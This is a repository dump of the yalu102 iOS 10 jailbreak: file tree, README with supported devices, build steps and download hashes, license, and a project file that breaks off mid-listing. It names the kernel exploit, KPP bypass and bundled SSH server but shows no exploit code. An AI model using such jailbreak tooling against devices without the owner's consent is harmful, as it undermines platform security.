├── .github └── ISSUE_TEMPLATE.md ├── .gitignore ├── LICENSE ├── README.md ├── yalu102.xcodeproj ├── project.pbxproj └── project.xcworkspace │ └── contents.xcworkspacedata └── yalu102 ├── 0.reload.plist ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets └── AppIcon.appiconset │ ├── AppIcon40x40@2x~ipad-1.png │ ├── AppIcon40x40@2x~ipad.png │ ├── AppIcon40x40@2x~ipadnotif.png │ ├── AppIcon40x40@2x~ipadsptl-1.png │ ├── AppIcon40x40@2x~ipadsptl.png │ ├── AppIcon40x40@2x~ipadsptl3.png │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ ├── AppIcon40x40@3x~iphone.png │ ├── AppIcon40x40~ipad-1.png │ ├── AppIcon40x40~ipad-2.png │ ├── AppIcon40x40~ipad.png │ ├── AppIcon60x60.png │ ├── AppIcon60x60@2x.png │ ├── AppIcon60x60@2x~ipad.png │ ├── AppIcon60x60@2x~ipadpro.png │ ├── AppIcon60x60@3x.png │ ├── AppIcon60x60~ipad.png │ └── Contents.json ├── Base.lproj ├── LaunchScreen.storyboard └── Main.storyboard ├── IOKit.tbd ├── Info.plist ├── ViewController.h ├── ViewController.m ├── bootstrap.tar ├── devicesupport.h ├── devicesupport.m ├── dropbear.plist ├── iokitmig64.o ├── jailbreak.m ├── launchctl ├── main.m ├── offsets.c ├── offsets.h ├── patchfinder64.h ├── patchfinder64.o ├── pte_stuff.h ├── reload └── tar /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | This is not a support forum or generic mailing list. 2 | 3 | This form is exclusively for reporting issues caused directly by the inner workings of yalu. 4 | 5 | Direct your jailbreaking questions to one of these fine communities: 6 | 7 | * https://reddit.com/r/jailbreak 8 | * http://www.jailbreakqa.com/ 9 | 10 | Issues, which are not related to yalu's code, may be closed without comment. Do NOT post about: Cydia, tweak, respring/bootloop or app issues UNLESS you have evidence that they are caused by an error in the jailbreaking software itself. 11 | 12 | (Delete this bit after reading, and replace it by "I read the issue posting guidelines.") 13 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 2 | Version 2, December 2004 3 | 4 | Copyright (C) 2004 Sam Hocevar 5 | 6 | Everyone is permitted to copy and distribute verbatim or modified 7 | copies of this license document, and changing it is allowed as long 8 | as the name is changed. 9 | 10 | DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE 11 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 12 | 13 | 0. You just DO WHAT THE FUCK YOU WANT TO. 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | ![Yalu logo](https://github.com/kpwn/yalu102/blob/master/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png?raw=true) 4 | 5 | A "work in progress" iOS jailbreak for 64-bit devices created by [qwertyoruiopz](https://twitter.com/qwertyoruiopz) and [marcograssi](marcograss). 6 | 7 | Please use the "Issues" tab for **code related** issues only. If you need support please search on [/r/jailbreak](https://reddit.com/r/jailbreak) before posting a question there. 8 | 9 | ## Supported Devices and iOS versions 10 | 11 | | Device | Version | 12 | |---------|----------| 13 | | iPad Pro | iOS 10.0.0 -> iOS 10.2 | 14 | | iPhone 6S | iOS 10.0.0 -> iOS 10.2 | 15 | | iPhone SE | iOS 10.0.0 -> iOS 10.2 | 16 | | iPhone 5S | iOS 10.0.0 -> iOS 10.2 | 17 | | iPad Air| iOS 10.0.0 -> iOS 10.2 | 18 | | iPad Mini 2| iOS 10.0.0 -> iOS 10.2 | 19 | | iPhone 6 | iOS 10.0.0 -> iOS 10.2 | 20 | | iPad Mini 3| iOS 10.0.0 -> iOS 10.2 | 21 | | iPad Air 2| iOS 10.0.0 -> iOS 10.2 | 22 | | iPad Mini 4 | iOS 10.0.0 -> iOS 10.2 | 23 | | iPod touch (6G) | iOS 10.0.0 -> iOS 10.2 | 24 | 25 | ### Planned Support: 26 | 27 | In the near future, the jailbreak will support the following devices: 28 | 29 | | Device | Version | 30 | |---------|----------| 31 | | iPhone 7 | iOS 10.0.0 -> iOS 10.1.1 | 32 | 33 | **Note, the iPhone 7 is only supported till iOS 10.1.1** 34 | If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual exploit behind this still works, but the KPP bypass does not. 35 | 36 | ## Compiling: 37 | 38 | 1. `git clone` the repo. 39 | 2. Open the repo in Xcode 40 | 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) 41 | 4. Include the IOKit headers, and add them to your search path. 42 | 5. Run the project. 43 | 44 | ## Warnings 45 | 46 | This jailbreak is a work in progress. Some things do not work, but most things do. 47 | 48 | Do not install things that are untested. 49 | 50 | **AppSync and other unsupported and untested software will probably throw your device into a bootloop or do other bad things.** Do not open an issue complaining that your device has been bootlooped because you installed other software. You have been warned. 51 | 52 | ## Installing 53 | 54 | > DO NOT DOWNLOAD THIS SOFTWARE FROM OTHER SOURCES OTHER THAN THESE LINKS UNDER ANY CIRCUMSTANCE. IT IS VERY EASY TO BACKDOOR THIS SORT OF SOFTWARE TO CONTAIN MALWARE. PLEASE BE EXTREMELY CAREFUL. THESE MIRRORS ARE TRUSTED, BUT STILL CHECK THE SHA1. 55 | 56 | * Download the pre-compiled version from the table below. 57 | * [Check the SHA1 hash](http://onlinemd5.com) of the downloaded file (optional but recommended). 58 | * Install using [Cydia Impactor](http://www.cydiaimpactor.com/). 59 | * Open the application and follow instructions. 60 | 61 | 62 | | Version | Download | SHA1 | 63 | |---------|----------|------| 64 | | Beta 7 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta7.ipa) | 4afa99d4b568aa8cbb9ac61fddd584111fed79c5 | 65 | | Beta 6 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta6.ipa) | 0130ebe60c97e2013a4b849b7d9bc321d749f304 | 66 | | Beta 5 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta5.ipa) | f8eb6cd37054a9d25b818e3bddd13bfedbf72df1 | 67 | | Beta 4 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta4.ipa) | f8270e59d7d7267613ffa63217b91fea425eec36 | 68 | | Beta 3 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta3.ipa) | b2e0bdd31566f876d67cba036b5d29aef7ff257d | 69 | | Beta 2 | [Link](https://yalu.qwertyoruiop.com/yalu102_beta.ipa) | 4fddad7cca8aa0c0a6579c1d63d00917f15efc86 | 70 | | Beta 1 | [Link](https://yalu.qwertyoruiop.com/yalu102_alpha.ipa) | 2fe14f1c1e1a0d26203bbb123f6747a978dd2b4f | 71 | 72 | ## Contributing 73 | 74 | Create a fork of the repository, make your changes and then create a pull request. 75 | Please be sure to check if the pull request has been made before, before creating a new one. Note, any pull requests adding IOKit headers will be closed. Please respect copyright laws, and do not distribute / download IOKit headers from unofficial sources: they are bundled legally with macOS SDK 76 | 77 | -------------------------------------------------------------------------------- /yalu102.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 46; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; 11 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; 12 | EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; 13 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */; }; 14 | EA9900E81E1E9F060056FEBD /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900E71E1E9F060056FEBD /* main.m */; }; 15 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900EA1E1E9F060056FEBD /* AppDelegate.m */; }; 16 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; 17 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; 18 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; 19 | EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; 20 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; 21 | EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; 22 | EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; 23 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; 24 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; 25 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; 26 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; 27 | EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */ = {isa = PBXBuildFile; fileRef = EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */; }; 28 | /* End PBXBuildFile section */ 29 | 30 | /* Begin PBXFileReference section */ 31 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 32 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; 33 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; 34 | EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; 35 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 36 | EA9900E31E1E9F060056FEBD /* yalu102.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = yalu102.app; sourceTree = BUILT_PRODUCTS_DIR; }; 37 | EA9900E71E1E9F060056FEBD /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 38 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 39 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 40 | EA9900EC1E1E9F060056FEBD /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 41 | EA9900ED1E1E9F060056FEBD /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 42 | EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 43 | EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 44 | EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 45 | EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; 46 | EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 47 | EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 48 | EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 49 | EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 50 | EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; 51 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; 52 | EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; 53 | EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; 54 | EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; 55 | EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; 56 | EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */ = {isa = PBXFileReference; explicitFileType = file.bplist; path = dropbear.plist; sourceTree = ""; }; 57 | /* End PBXFileReference section */ 58 | 59 | /* Begin PBXFrameworksBuildPhase section */ 60 | EA9900E01E1E9F060056FEBD /* Frameworks */ = { 61 | isa = PBXFrameworksBuildPhase; 62 | buildActionMask = 2147483647; 63 | files = ( 64 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, 65 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, 66 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, 67 | ); 68 | runOnlyForDeploymentPostprocessing = 0; 69 | }; 70 | /* End PBXFrameworksBuildPhase section */ 71 | 72 | /* Begin PBXGroup section */ 73 | EA9900DA1E1E9F060056FEBD = { 74 | isa = PBXGroup; 75 | children = ( 76 | EA9900E51E1E9F060056FEBD /* yalu102 */, 77 | EA9900E41E1E9F060056FEBD /* Products */, 78 | ); 79 | sourceTree = ""; 80 | }; 81 | EA9900E41E1E9F060056FEBD /* Products */ = { 82 | isa = PBXGroup; 83 | children = ( 84 | EA9900E31E1E9F060056FEBD /* yalu102.app */, 85 | ); 86 | name = Products; 87 | sourceTree = ""; 88 | }; 89 | EA9900E51E1E9F060056FEBD /* yalu102 */ = { 90 | isa = PBXGroup; 91 | children = ( 92 | EAA7F7C61E3EE4AF00BE3C64 /* dropbear.plist */, 93 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, 94 | EA9901021E219C210056FEBD /* offsets.c */, 95 | EA9901031E219C210056FEBD /* offsets.h */, 96 | EA99010D1E21A1560056FEBD /* jailbreak.m */, 97 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */, 98 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */, 99 | EA1A3BAC1E399006009CA025 /* reload */, 100 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, 101 | EA9900EC1E1E9F060056FEBD /* ViewController.h */, 102 | EA9900ED1E1E9F060056FEBD /* ViewController.m */, 103 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */, 104 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, 105 | EA9900F71E1E9F060056FEBD /* Info.plist */, 106 | EA9901051E219FF10056FEBD /* bootstrap.tar */, 107 | EA9901091E21A04C0056FEBD /* tar */, 108 | EA99010B1E21A0520056FEBD /* launchctl */, 109 | EA9901131E21A1B00056FEBD /* iokitmig64.o */, 110 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, 111 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */, 112 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, 113 | EA9901181E21A2180056FEBD /* IOKit.tbd */, 114 | EA9901151E21A1D90056FEBD /* devicesupport.h */, 115 | EA9901161E21A1D90056FEBD /* devicesupport.m */, 116 | EA9900E61E1E9F060056FEBD /* Supporting Files */, 117 | ); 118 | path = yalu102; 119 | sourceTree = ""; 120 | }; 121 | EA9900E61E1E9F060056FEBD /* Supporting Files */ = { 122 | isa = PBXGroup; 123 | children = ( 124 | EA9900E71E1E9F060056FEBD /* main.m */, 125 | ); 126 | name = "Supporting Files"; 127 | sourceTree = ""; 128 | }; 129 | /* End PBXGroup section */ 130 | 131 | /* Begin PBXNativeTarget section */ 132 | EA9900E21E1E9F060056FEBD /* yalu102 */ = { 133 | isa = PBXNativeTarget; 134 | buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; 135 | buildPhases = ( 136 | EA9900DF1E1E9F060056FEBD /* Sources */, 137 | EA9900E01E1E9F060056FEBD /* Frameworks */, 138 | EA9900E11E1E9F060056FEBD /* Resources */, 139 | ); 140 | buildRules = ( 141 | ); 142 | dependencies = ( 143 | ); 144 | name = yalu102; 145 | productName = yalu102; 146 | productReference = EA9900E31E1E9F060056FEBD /* yalu102.app */; 147 | productType = "com.apple.product-type.application"; 148 | }; 149 | /* End PBXNativeTarget section */ 150 | 151 | /* Begin PBXProject section */ 152 | EA9900DB1E1E9F060056FEBD /* Project object */ = { 153 | isa = PBXProject; 154 | attributes = { 155 | LastUpgradeCheck = 0820; 156 | ORGANIZATIONNAME = kimjongcracks; 157 | TargetAttributes = { 158 | EA9900E21E1E9F060056FEBD = { 159 | CreatedOnToolsVersion = 8.2.1; 160 | DevelopmentTeam = CGTX3WH3ZS; 161 | ProvisioningStyle = Automatic; 162 | }; 163 | }; 164 | }; 165 | buildConfigurationList = EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */; 166 | compatibilityVersion = "Xcode 3.2"; 167 | developmentRegion = English; 168 | hasScannedForEncodings = 0; 169 | knownRegions = ( 170 | en, 171 | Base, 172 | ); 173 | mainGroup = EA9900DA1E1E9F060056FEBD; 174 | productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; 175 | projectDirPath = ""; 176 | projectRoot = ""; 177 | targets = ( 178 | EA9900E21E1E9F060056FEBD /* yalu102 */, 179 | ); 180 | }; 181 | /* End PBXProject section */ 182 | 183 | /* Begin PBXResourcesBuildPhase section */ 184 | EA9900E11E1E9F060056FEBD /* Resources */ = { 185 | isa = PBXResourcesBuildPhase; 186 | buildActionMask = 2147483647; 187 | files = ( 188 | EA99010A1E21A04C0056FEBD /* tar in Resources */, 189 | EA99010C1E21A0520056FEBD /* launchctl in Resources */, 190 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, 191 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, 192 | EAA7F7C71E3EE4AF00BE3C64 /* dropbear.plist in Resources */, 193 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, 194 | EA1A3BAD1E399006009CA025 /* reload in Resources */, 195 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, 196 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, 197 | ); 198 | runOnlyForDeploymentPostprocessing = 0; 199 | }; 200 | /* End PBXResourcesBuildPhase section */ 201 | 202 | /* Begin PBXSourcesBuildPhase section */ 203 | EA9900DF1E1E9F060056FEBD /* Sources */ = { 204 | isa = PBXSourcesBuildPhase; 205 | buildActionMask = 2147483647; 206 | files = ( 207 | EA9901041E219C210056FEBD /* offsets.c in Sources */, 208 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, 209 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, 210 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, 211 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, 212 | EA9900E81E1E9F060056FEBD /* main.m in Sources */, 213 | ); 214 | runOnlyForDeploymentPostprocessing = 0; 215 | }; 216 | /* End PBXSourcesBuildPhase section */ 217 | 218 | /* Begin PBXVariantGroup section */ 219 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */ = { 220 | isa = PBXVariantGroup; 221 | children = ( 222 | EA9900F01E1E9F060056FEBD /* Base */, 223 | ); 224 | name = Main.storyboard; 225 | sourceTree = ""; 226 | }; 227 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */ = { 228 | isa = PBXVariantGroup; 229 | children = ( 230 | EA9900F51E1E9F060056FEBD /* Base */, 231 | ); 232 | name = LaunchScreen.storyboard; 233 | sourceTree = ""; 234 | }; 235 | /* End PBXVariantGroup section */ 236 | 237 | /* Begin XCBuildConfiguration section */ 238 | EA9900F81E1E9F060056FEBD /* Debug */ = { 239 | isa = XCBuildConfiguration; 240 | buildSettings = { 241 | ALWAYS_SEARCH_USER_PATHS = NO; 242 | ARCHS = armv7; 243 | CLANG_ANALYZER_NONNULL = YES; 244 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 245 | CLANG_CXX_LIBRARY = "libc++"; 246 | CLANG_ENABLE_MODULES = YES; 247 | CLANG_ENABLE_OBJC_ARC = YES; 248 | CLANG_WARN_BOOL_CONVERSION = YES; 249 | CLANG_WARN_CONSTANT_CONVERSION = YES; 250 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 251 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 252 | CLANG_WARN_EMPTY_BODY = YES; 253 | CLANG_WARN_ENUM_CONVERSION = YES; 254 | CLANG_WARN_INFINITE_RECURSION = YES; 255 | CLANG_WARN_INT_CONVERSION = YES; 256 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 257 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 258 | CLANG_WARN_UNREACHABLE_CODE = YES; 259 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 260 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 261 | COPY_PHASE_STRIP = NO; 262 | DEBUG_INFORMATION_FORMAT = dwarf; 263 | ENABLE_BITCODE = NO; 264 | ENABLE_STRICT_OBJC_MSGSEND = YES; 265 | ENABLE_TESTABILITY = YES; 266 | GCC_C_LANGUAGE_STANDARD = gnu99; 267 | GCC_DYNAMIC_NO_PIC = NO; 268 | GCC_NO_COMMON_BLOCKS = YES; 269 | GCC_OPTIMIZATION_LEVEL = 0; 270 | GCC_PREPROCESSOR_DEFINITIONS = ( 271 | "DEBUG=1", 272 | "$(inherited)", 273 | ); 274 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 275 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 276 | GCC_WARN_UNDECLARED_SELECTOR = YES; 277 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 278 | GCC_WARN_UNUSED_FUNCTION = YES; 279 | GCC_WARN_UNUSED_VARIABLE = YES; 280 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 281 | LD_NO_PIE = YES; 282 | MTL_ENABLE_DEBUG_INFO = YES; 283 | ONLY_ACTIVE_ARCH = YES; 284 | SDKROOT = iphoneos; 285 | TARGETED_DEVICE_FAMILY = "1,2"; 286 | }; 287 | name = Debug; 288 | }; 289 | EA9900F91E1E9F060056FEBD /* Release */ = { 290 | isa = XCBuildConfiguration; 291 | buildSettings = { 292 | ALWAYS_SEARCH_USER_PATHS = NO; 293 | ARCHS = armv7; 294 | CLANG_ANALYZER_NONNULL = YES; 295 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 296 | CLANG_CXX_LIBRARY = "libc++"; 297 | CLANG_ENABLE_MODULES = YES; 298 | CLANG_ENABLE_OBJC_ARC = YES; 299 | CLANG_WARN_BOOL_CONVERSION = YES; 300 | CLANG_WARN_CONSTANT_CONVERSION = YES; 301 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 302 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 303 | CLANG_WARN_EMPTY_BODY = YES; 304 | CLANG_WARN_ENUM_CONVERSION = YES; 305 | CLANG_WARN_INFINITE_RECURSION = YES; 306 | CLANG_WARN_INT_CONVERSION = YES; 307 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 308 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 309 | CLANG_WARN_UNREACHABLE_CODE = YES; 310 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 311 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 312 | COPY_PHASE_STRIP = NO; 313 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 314 | ENABLE_BITCODE = NO; 315 | ENABLE_NS_ASSERTIONS = NO; 316 | ENABLE_STRICT_OBJC_MSGSEND = YES; 317 | GCC_C_LANGUAGE_STANDARD = gnu99; 318 | GCC_NO_COMMON_BLOCKS = YES; 319 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 320 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 321 | GCC_WARN_UNDECLARED_SELECTOR = YES; 322 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 323 | GCC_WARN_UNUSED_FUNCTION = YES; 324 | GCC_WARN_UNUSED_VARIABLE = YES; 325 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 326 | LD_NO_PIE = YES; 327 | MTL_ENABLE_DEBUG_INFO = NO; 328 | SDKROOT = iphoneos; 329 | TARGETED_DEVICE_FAMILY = "1,2"; 330 | VALIDATE_PRODUCT = YES; 331 | }; 332 | name = Release; 333 | }; 334 | EA9900FB1E1E9F060056FEBD /* Debug */ = { 335 | isa = XCBuildConfiguration; 336 | buildSettings = { 337 | ARCHS = armv7; 338 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 339 | CLANG_ENABLE_OBJC_ARC = NO; 340 | DEVELOPMENT_TEAM = CGTX3WH3ZS; 341 | INFOPLIST_FILE = yalu102/Info.plist; 342 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 343 | LIBRARY_SEARCH_PATHS = ( 344 | "$(inherited)", 345 | "$(PROJECT_DIR)/yalu102", 346 | ); 347 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 348 | PRODUCT_NAME = "$(TARGET_NAME)"; 349 | VALID_ARCHS = armv7; 350 | }; 351 | name = Debug; 352 | }; 353 | EA9900FC1E1E9F060056FEBD /* Release */ = { 354 | isa = XCBuildConfiguration; 355 | buildSettings = { 356 | ARCHS = armv7; 357 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 358 | CLANG_ENABLE_OBJC_ARC = NO; 359 | DEVELOPMENT_TEAM = CGTX3WH3ZS; 360 | INFOPLIST_FILE = yalu102/Info.plist; 361 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 362 | LIBRARY_SEARCH_PATHS = ( 363 | "$(inherited)", 364 | "$(PROJECT_DIR)/yalu102", 365 | ); 366 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 367 | PRODUCT_NAME = "$(TARGET_NAME)"; 368 | VALID_ARCHS = armv7; 369 | }; 370 | name = Release; 371 | }; 372 | /* End XCBuildConfiguration section */ 373 | 374 | /* Begin XCConfigurationList section */ 375 | EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */ = { 376 | 